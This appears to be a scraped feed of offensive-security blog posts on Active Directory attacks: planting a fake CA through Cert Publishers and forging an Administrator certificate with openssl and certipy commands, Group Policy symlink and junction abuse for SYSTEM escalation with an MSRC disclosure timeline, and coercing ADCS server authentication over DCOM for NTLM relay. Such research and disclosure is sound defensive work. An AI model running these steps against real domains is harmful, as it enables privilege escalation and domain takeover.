Following various tests, where I attempted to substitute the existing certificate stored in the caCertificate attribute of the CA object with a fake one or add to the current caCertificate a fake certificate (without success, as the fake CA was not published), I eventually identified a solution that circumvents the existing ‘safety’ (or should we say ‘security’?) boundary. Why just not creating a fake one with the exact same common name as the official CA? If it works as expected, it would be appended to the existing CA’s configuration…

Creating a fake self-signed CA with the openssl tool is fairly straightforward, I won’t go into details as I already explained this in my previous post.

The provided common name matches the name of our official CA.

After obtaining the certificate, we will log in to the AD domain using the credentials of a user who is a member of Cert Publishers and proceed to add the certificate to the Certification Authorities container

We can safely ignore the error, and with adsiedit we can confirm that the certificate was added:

Let’s see if it works, but instead of waiting for the GPO refresh, we manually perform a gpupdate /force and look in the certificates of the local computer/user:

Bingo! We now have our fake Certificate Authority (CA) established as a trusted entity. To confirm its functionality, we’ll configure a web server with an SSL certificate issued by our CA.

In my instance, I used an IIS web server and requested an SSL certificate (you can do this in many different ways..) using the Certificates snap-in (I’ll omit some steps, as there is a huge documentation available on how to accomplish this)

Once we get our csr file (evil.csr), we need to setup the CA configuration for the CRL endpoints and certificate signing.

[ca]
default_ca = EVILCA
[crl_ext]
authorityKeyIdentifier=keyid:always
[EVILCA]
dir = ./
new_certs_dir = $dir
unique_subject = no
certificate = ./evilca.crt
database = ./certindex
private_key = ./evilca.key
serial = ./certserial
default_days = 729
default_md = sha1
policy = myca_policy
x509_extensions = myca_extensions
crlnumber = ./crlnumber
default_crl_days = 729
default_md = sha256
copy_extensions = copy
[myca_policy]
commonName = supplied
stateOrProvinceName = optional
countryName = optional
emailAddress = optional
organizationName = supplied
[myca_extensions]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
keyUsage = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
crlDistributionPoints = URI:http://192.168.1.88/root.crl

Run the usual commands:

openssl genrsa -out cert.key 2048
openssl req -new -key cert.key -out cert.csr
touch certindex
echo 01 > certserial
echo 01 > crlnumber
openssl ca -batch -config ca.conf -notext -in cert.csr -out cert.crt
openssl pkcs12 -export -out cert.p12 -inkey cert.key -in cert.crt -chain -CAfile evilca.crt
openssl ca -config ca.conf -gencrl -keyfile evilca.key -cert evilca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl

We are now ready to process the certificate request:

And import the evil.crt on our webserver. From a domain joined machine, we try to navigate to https://myevilserver.mylab.local:

As expected, the site is trusted by our fake CA.

With forged trusted certificate could empower a malicious actor to execute various attacks, potentially resulting in the compromise of the entire domain by enrolling any type of certificates which will be then trusted…

While not an expert on these abuses, the following are initial considerations:

  • Man in the middle (MITM) attacks such as SSL inspection to decrypt all the traffic
  • Code signing of malicious enterprise applications or script
  • Server authentication, VPN,…

Moving further

But let’s go a set further. Remember my so-called Silver Certificate?

To be able to (ab)use a forged client certificate for authentication, via PKINIT or Schannel, the CA also has to present in NTAuthcertificates store.

Let’s consider the scenario where the Cert Publishers group is granted write access to the NTAuthcertificates object. While not the default setting, I’ve encountered a couple of real-world scenarios where this (mis)configuration was implemented. This transforms the original situation described in my previous post, by having only write permission on NTAuthcertificates, from a mere persistence technique to a genuine privilege escalation. This shift is noteworthy, especially considering that we already have a trusted Certificate Authority at our disposal, enabling the forging of client certificates.

All we need at this point is to add our fake CA certificate to the NTAuthcertificates object (assuming Cert Publishers have been granted this permission)

Let’s wait for the GP refresh on the Domain Controllers and then proceed as usual using for example the certipy tool:

certipy forge -ca-pfx evilca.pfx -upn [email protected] -subject 'CN=Administrator,CN=Users,DC=mylab,DC=local' -crl 'http://192.168.1.88/root.crl'
certipy auth -pfx administrator_forged.pfx -dc-ip 192.168.212.21

And get the expected result!

Conclusions

At the end of our experiments, we can derive the following conclusions:

  • Members of Cert Publishers can add a malicious Certification Authority under the control of an ADCS environment and subsequently be trusted by all the clients. While certificates issued under this CA will not be automatically trusted for client authentication via PKINIT or SChannel, they could still be abused for other malicious tasks.
  • Cert Publishers membership + write access to NTAuthcertificates is the most dangerous mix in these scenarios. You can then forge and request a certificate, the Silver++ 🙂 , for client authentication against any user in the domain.
  • Cert Publishers should be considered High-Value Targets (or Tier-0 members), and membership in this group should be actively monitored, along with possible attack paths originating from non-privileged users leading to this group.

That’s all 😉

Insomni'hack 2024 CTF Teaser - Cache Cache

By: itm4n
20 January 2024 at 23:00
Last year, for the Insomni’hack 2023 CTF Teaser, I created a challenge based on a logic bug in a Windows RPC server. I was pleased with the result, so I renewed the experience. Besides, I already knew what type of bug to tackle for this new edition. :smiling_imp: Personal thoughts Like my previous write-up, I will begin with some thoughts about the difficulties of creating a challenge and fac...

Do not trust this Group Policy!

By: Decoder
23 January 2024 at 08:03

Sometimes I think that starting with a hypothetical scenario can be better than immediately diving into the details of a vulnerability. This approach, in my opinion, provides crucial context for a clearer understanding, especially when the vulnerability is easy to understand but the scenario where it could apply is not.

This post is about possible abuse of a group policy configuration for Local Privilege Escalation, very similar to the one I already reported and MS fixed with CVE-2022-37955.

First scenario

So we have our Active Directory domain MYLAB.LOCAL with several Group Policies. Any domain user can by default access the SYSVOL share, stored in this case \\mylab.local\sysvol\mylab.local\Policies, and read the configurations of the group policies.

At some point, our attention is caught by a “Files” preference group policy identified by the Files.xml file and located under the Machine context:

The Files policy is used for performing file operations such as copying or deleting one or more files from a source folder to a destination folder. The source and destination can be paths or UNC names and the operation can be performed under the Machine context or the logged-on user context if you specify it.

What actions does this policy perform on files? A thorough analysis of the contents of Files.xml can offer a clear understanding:

The configuration specifies that the file agentstartup.log, residing in the local C:\ProgramData\Agent\Logs directory, should be copied to a hidden server share logfilecollector$ within the agentstartup folder on the server. The destination filename on the server will be derived from the computer name.

This policy has been configured to copy the log files produced during the startup phase of an agent running on the domain computers to a centralized location. Alternatively, a group policy startup script executing identical copy operations could also be employed and would yield the same outcome.

When will the policy be processed? Running under the Machine context, at startup, and also on demand by performing a gpudate /force command. This share should be writable by the computer accounts where the policy is applied.

This is how the policy, configured by an administrator, would look like:

And this is how the file server should have been configured. In this case, the directory located on the share is accessible by Domain Users in read-only but Domain Computers have modify permissions as expected:

There’s also another interesting user logfileoperator who also has modify permissions:

This account is responsible for managing log files. As a Domain User we can also look at the contents of the folder:

The policy is also applied to the file server share which hosts the destination files.

By putting all the pieces together the question is: what potential consequences could arise if this user account, logfileoperator, is compromised by an attacker? Is there any possibility of privilege escalation?

The logfileoperator account can rdp to the file server (SRV1-MYLAB in this case) as a low-privileged user for performing his maintenance tasks.

Let’s assume that our attacker, impersonating logfileoperator  gains access to SRV1-MYLAB

Let’s check the source directory:

The default security settings of the ProgramData directory have not been modified, so low-privileged users can modify the contents of the Logs directory…

This scenario would be perfect for a very simple and easy escalation path by abusing the well-known symlinks creation via NTObjectmanager tricks.

To summarize:

  • Delete c:\programdata\Agent\Logs\agentstartup.log
  • Put a malicious dll in this folder and name it agentstartup.log
  • Delete contents of c:\logfilecollector\agentstartup
  • create a symlink for the target file SRV1-MYLAB.log pointing to destination C:\windows\System32\myevil.dll
  • Performing then a gpupdate /force will trigger the group policy which will copy our malicious agentstartup.log by following the symlink configured in SRV1-MYLAB.log to the destination c:\windows\system32\myevil.dll with SYSTEM privileges, given that the entire file copy operation is performed locally under the Machine context.

However, we currently face an issue. A few years ago, MS introduced the “Redirection Trust” feature to address redirection attacks, particularly during group policy processing. This feature prevents a privileged process from reparsing a mount point created by a lower privileged process:

In Group Policy Client policy service (gpsvc) this feature is enforced.

But wait, our destination file is specified as UNC share and not a local drive, will Redirection Trust still work in this local scenario?

Guess what, it does not work! Our dll has been successfully copied:

We can see the successful operations in Procmon tool:

It turns out that the mitigation is not effective on shares. James Forshaw already mentioned this in an old tweet:

Yes, it works on all the newest and updated versions of Windows as of now, Insider builds included:

And no, I won’t explain again how someone could misuse an arbitrary file write with SYSTEM privileges. 😉

Second Scenario

Let’s explore another hypothetical scenario. This time the administrator has setup this Folder policy:

The policy, executed within the user configuration, will remove the logs folder along with all its files and subfolders located on the share \\127.0.0.1\EXPORTS\%username%, dynamically expanded to match the currently logged-in user.

The question arises: why does this configuration involve the localhost share?

Consider a scenario in our domain where a special folder containing user data is shared on all domain computers. The share name is \\<computername>\exports\<username>, but the physical path may vary for each computer. At some point, there is the requirement to create a policy for deleting a folder under this share (in this case, “logs”). The Folder preference suits our needs perfectly, but we want to use only one policy configuration and avoid specifying the physical path, which can differ. Instead, we opt for using the common share name \\127.0.0.1\… (localhost).

By default, the delete operation is performed under the SYSTEM account (unless configured to run under the user’s context). This default behavior aligns with our requirement, ensuring a sure folder removal.

But again, this could lead to abuse, right? What if we redirect the folder to be deleted to a target folder inaccessible to the user?

Let’s see what could happen:

Our user has his own shared folder and contents are under his control.

In this scenario, our previous c:\programdata\Agent contains also another subdirectory Updater that stores the executable for the Agent updater and is obviously read-only for users, as opposed to the parent folder Agent, because the updater runs with SYSTEM privileges….

So what’s the possible abuse? Can we transform an arbitrary folder delete to a privilege escalation? Let’s try it by creating a junction pointing to the c:\programdata\agent and perform gpupdate:

It worked as expected, a share was specified as the target folder and redirection mitigation did not work, so we were able to delete also the Updater folder. Now the last step would be to recreate the Updater folder, put a malicious exe inside, name it AgentUpdater.exe, trigger or wait for our agent to perform and update and we have SYSTEM access…

Conclusions

This was merely a hypothetical scenario, but I presume there are other real-world situations very similar to this, don’t you agree?

For example if “Group Policy Logging and Tracing” log files are saved on a shared folder:

Hint: when log file size exceeds 1024kB it will be saved as .bak and a new log file will be created. However, I’ll leave this exercise to the reader 😉

There is one limitation to exploiting this security bypass. The shared folder that will be redirected and contains the symlink must be a subfolder of the share; otherwise, you will encounter a “device not ready” error.

Should this be considered a misconfiguration vulnerability or software (ie: logic bug) vulnerability?

Hard to say, I obviously reported this to MSRC:

  • December 29, 2023: Initial submission.
  • January 11, 2024: MSRC responded, stating that the case did not meet the criteria for servicing as it necessitates “Administrator and extensive user interaction.” (????) They closed the case but indicated a possibility of revisiting it if additional information impacting the investigation could be provided.
  • January 11, 2024: I answered, providing a more detailed explanation of the scenario and attached a video. I emphasized that it does not require administrator interaction, as the issue revolves around exploiting an existing group policy with this configuration. Side note: If someone could clarify what MSRC means by “Administrator interaction is required”, I would be more than happy to correct my post and give due mention
  • January 15, 2024: No response from MSRC. I sent an email with the draft of this post attached, informing them that my intention is to publish it in the absence of their feedback
  • January 22, 2024: MSRC told me that “they looked over the article and had no concerns or corrections”. Cool, appreciate it 🙂
  • January 23, 2024: Post published.

I find it perplexing that MSRC couldn’t offer a more comprehensive justification for their decision, instead of the given one that implies it would need Administrator (???) interaction.

Well, it is what it is, I won’t be organizing a dramatic exit just because of this tiny inconvenience 😉

If MS won’t (silently) fix this issue here are my 2 cents to save the world from potential catastrophe:

  • Carefully evaluate permissions on source and destination files/folders when performing operations that involve creation or deletion operations via group policy
  • If the destination is a share, a red flag should be raised. Possibly avoid this configuration, if really necessary, follow the whole process logic and ask yourself at each step if it could be abused by placing a redirection.

That’s all 🙂 ..and thanks to Robin @ipcdollar1 for the review

A Practical Guide to PrintNightmare in 2024

By: itm4n
27 January 2024 at 23:00
Although PrintNightmare and its variants were theoretically all addressed by Microsoft, it is still affecting organizations to this date, mainly because of quite confusing group policies and settings. In this blog post, I want to shed a light on those configuration issues, and hopefully provide clear guidance on how to remediate them. “PrintNightmare” and “Point and Print” Unless you’ve been ...

Extracting PEAP Credentials from Wired Network Profiles

By: itm4n
24 February 2024 at 23:00
A colleague of mine recently found himself in a situation where he had physical access to a Windows machine connected to a wired network using 802.1X and saved user credentials for the authentication. Naturally, he wanted to extract those credentials. Nothing extraordinary about that you might think, and yet, there was a twist… Where to start? For this blog post, I will assume the reader is a...

Hello: I’m your ADCS server and I want to authenticate against you

By: Decoder
26 February 2024 at 15:50

In my exploration of all the components and configurations related to the Windows Active Directory Certification Services (ADCS), after the “deep dive” in Cert Publishers group, I decided to take a look at the “Certificate Service DCOM Access” group.

This group is a built-in local security group and is populated by the special NT AUTHORITY\Authenticaterd Users identity group, which represents every Domain user account that can successfully log on to the domain, whenever the server assumes the role of a Certification Authority (CA) server by installing the Active Directory Certification Services (ADCS) role.

The “DCOM Access” is somewhat intriguing; it evokes potential vulnerabilities and exploitation 😉

But let’s start from the beginning. What’s the purpose of this group? MS says: “Members of this group are allowed to connect to Certification Authorities in the enterprise“.

In simpler terms, this group can enroll certificates via DCOM. Thus, it’s logical that all authenticated users and computers have access to the specific application.

Each time a user or computer enrolls or auto enrolls a certificate, it contacts the DCOM interfaces of the CertSrv Request application which are exposed through the MS-WCCE protocol, the Windows Client Certificate Enrollment Protocol.

There is also a specific set of interfaces for Certificate Services Remote Administration Protocol described in MS-CSRA.

I won’t delve into the specifics of these interfaces. Maybe there are interesting interfaces to explore and abuse, but for now, my focus was drawn to the activation permissions of this DCOM server.

The DCOMCNFG tool provides us a lot of useful info.

At the computer level, the Certificate Service DCOM Access group is “limited” to Local and Remote Launch permissions:

This does not mean that this group can activate all the DCOM objects, we have to look at the specific application, CertSrv Request in our case:

Everyone can activate from remote this DCOM server. To be honest, I would have expected to find the Certificate Service DCOM Access group here instead of Everyone, given that this group is limited to Local Launch and Local Activation permissions:

Maybe some kind of combined permissions and nested memberships are also evaluated.

There’s another interesting aspect as well: from what I observed, the Certificate Service DCOM Access group is one of the few groups, along with Distributed COM Users and Performance Log Users, that are granted Remote Activation permissions.

Let’s take a look at identity too:

This DCOM application impersonates the SYSTEM account, which is what we need because it represents the highest local privileged identity.

So, we have a privileged DCOM server running that can be activated remotely by any authenticated domain user. This seems prone to our loved *potato exploits, don’t you think?

In summary, most of these exploits rely on abusing a DCOM activation service, running under a highly privileged context, by unmarshalling an IStorage object and reflecting the NTLM authentication back to a local RPC TCP endpoint to achieve local privilege escalation.

There are also variants of this attack that involve relaying the NTLM (and Kerberos) authentication of a user or computer to a remote endpoint using protocols such as LDAP, HTTP, or SMB, ultimately enabling privilege escalation up to Domain Admin. And this is what @splinter_code and I did in our RemotePotato0.

But this scenario is different, as a low-privileged domain user, we want to activate a remote DCOM application running under a high-privileged context and force it to authenticate against a remote listener running on our machine so that we can capture and relay this authentication to another service.

We will (hopefully) get the authentication of the remote computer itself when the DCOM application is running under the SYSTEM or Network Service context.

Sounds great! l Now, what specific steps should we take to implement this?

Well, it is much simpler than I initially thought 🙂

Starting from the original JuicyPotato I made some minor changes:

  • Set up a redirector (socat) on a Linux machine on port 135 to redirect all traffic on our attacker machine on a dedicated port (ex: 9999). You certainly know that we can no longer specify a custom port for Oxid Resolution 😉 .
  • In JuicyPotato code:
    • Initialize a COSERVERINFO structure and specify the IP address of the remote server where we want to activate the DCOM object (the ADCS server)
    • Initialize a COAUTHIDENTITY and populate the username, password, and domain attributes.
    • Assign the COAUTHIDENTITY to the COSERVERINFO structure
    • In IStorageTrigger::Marshallfinterface specify the redirector IP address
    • In CoGetInstanceFromIStorage() pass the the COSERVERINFO structure:

And yes it worked 🙂 Dumping the NTLM messages received on our socket server we can see that we get an authentication type 3 message from the remote CA server (SRV1-MYLAB):

The network capture highlights that the Remote Activation requested by our low-privileged user was successful:

The final step is to forward the NTLM authentication to an external relay, such as ntlmrelayx, enabling authentication to another service as the CA computer itself.

Last but not least, since we have an RPC Client authenticating, we must encapsulate and forward the authentication messages using a protocol already implemented and supported in ntlmrelayx, such as HTTP.

I bet that now the fateful question arises:

Ok, regular domain users can coerce the authentication of an ADCS server from remote, intercept the authentication messages, and relay it, but is this really useful?

Well, considering the existence of other unpatched methods to coerce authentication of a Domain Controller, such as DFSCoerce, I would argue its utility may be limited.

To complicate matters further, the only protocols that can be relayed, due the the hardening MS recently made in DCOM, at the moment are HTTP and SMB (if signing is not required).

In my lab, I tested the relay against the HTTP /CertSrv endpoint of a CA web enrollment server running on a different machine (guess why?… you cannot relay back to the same machine over the network). With no NTLM mitigations in place, I requested a Machine certificate for the CA server.

The attack flow is shown below:

With this certificate, I could then log onto the ADCS server in a highly privileged context. For example, I could back up the private key of the CA, ultimately enabling the forging of certificates on behalf of any user.

The POC

I rewrote some parts of our old JuicyPotato to adapt it to this new scenario. It’s a quick & dirty fix and somehow limited, but it was more than enough to achieve my goal 🙂

You can get rid of the socat redirector by using our JuicyPotatoNG code and implement a fake Oxid Resolver like we did in RemotePotato0, with the extra bonus that you can also control the SPN and perform a Kerberos relay too… but I’ll leave it up to you 😉

Source Code: https://github.com/decoder-it/ADCSCoercePotato/

Conclusions

While the method I described for coercing authentication may not be groundbreaking, it offers interesting alternative ways to force the authentication of a remote server by abusing the Remote Activation permission granted to regular domain users.

This capability is only limited to the Certificate Service DCOM Access group, which is populated only when the ADCS service is running. However, there could be legacy DCOM applications that grant Remote Activation to everyone.

Imagine DCOM Applications running under the context of the “Interactive User” with Remote Activation available to regular users. With cross-session implementation, you could also retrieve the authentication of a logged-in user 😉

Another valid reason to avoid installing unnecessary services on a Domain Controller, including the ADCS service!

That’s all 🙂

❌
❌